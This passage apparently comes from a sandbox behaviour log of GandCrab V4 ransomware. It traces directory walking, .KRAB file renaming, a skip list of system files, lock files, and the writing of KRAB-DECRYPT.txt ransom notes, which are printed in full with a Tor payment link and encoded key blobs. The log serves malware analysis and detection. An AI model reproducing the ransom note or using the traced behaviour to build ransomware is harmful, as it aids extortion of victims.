(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 55 [0057.865] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0057.865] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd360 [0057.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.865] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.865] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.865] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.865] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.865] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.865] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.865] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a08d2ca4dee3d.lock" [0057.865] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.865] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0057.865] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a08d2ca4dee3d.lock") returned 78 [0057.865] lstrlenW (lpString=".lock") returned 5 [0057.866] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.866] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.866] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.866] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.866] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.866] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.866] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.866] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\KRAB-DECRYPT.txt" [0057.866] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.867] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\KRAB-DECRYPT.txt.KRAB") returned 76 [0057.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\KRAB-DECRYPT.txt") returned 71 [0057.867] lstrlenW (lpString=".txt") returned 4 [0057.867] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.867] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.867] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\KRAB-DECRYPT.txt") returned 71 [0057.867] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\KRAB-DECRYPT.txt") returned 71 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.867] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.867] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.868] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0057.868] FindClose (in: hFindFile=0xfbd360 | out: hFindFile=0xfbd360) returned 1 [0057.868] CloseHandle (hObject=0x3ac) returned 1 [0057.868] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.868] lstrcmpW (lpString1="Bibliography", lpString2=".") returned 1 [0057.868] lstrcmpW (lpString1="Bibliography", lpString2="..") returned 1 [0057.868] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Bibliography" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography" [0057.868] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\" [0057.868] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.868] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.868] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.868] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.868] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.868] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.869] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.869] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\\\KRAB-DECRYPT.txt") returned 78 [0057.869] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0057.874] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.874] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.875] CloseHandle (hObject=0x3ac) returned 1 [0057.875] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.875] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.876] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x5, wMilliseconds=0x4d)) [0057.876] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.876] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.876] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.876] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a08d2ca4dee3d.lock") returned 84 [0057.876] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0057.882] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.883] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\") returned 61 [0057.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0057.883] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd420 [0057.883] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.883] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.883] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.883] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.883] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a08d2ca4dee3d.lock" [0057.883] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.884] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 89 [0057.884] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\d2ca4a08d2ca4dee3d.lock") returned 84 [0057.884] lstrlenW (lpString=".lock") returned 5 [0057.884] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.884] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.884] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.884] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.885] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.885] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.885] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.885] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\KRAB-DECRYPT.txt" [0057.885] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.885] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\KRAB-DECRYPT.txt.KRAB") returned 82 [0057.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\KRAB-DECRYPT.txt") returned 77 [0057.885] lstrlenW (lpString=".txt") returned 4 [0057.885] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.885] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.885] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\KRAB-DECRYPT.txt") returned 77 [0057.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\KRAB-DECRYPT.txt") returned 77 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.886] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.887] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.887] lstrcmpW (lpString1="Style", lpString2=".") returned 1 [0057.887] lstrcmpW (lpString1="Style", lpString2="..") returned 1 [0057.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2="Style" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0057.887] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\" [0057.887] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.887] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.887] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.887] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.887] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.887] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.887] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.888] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\\\KRAB-DECRYPT.txt") returned 84 [0057.888] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0057.894] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOd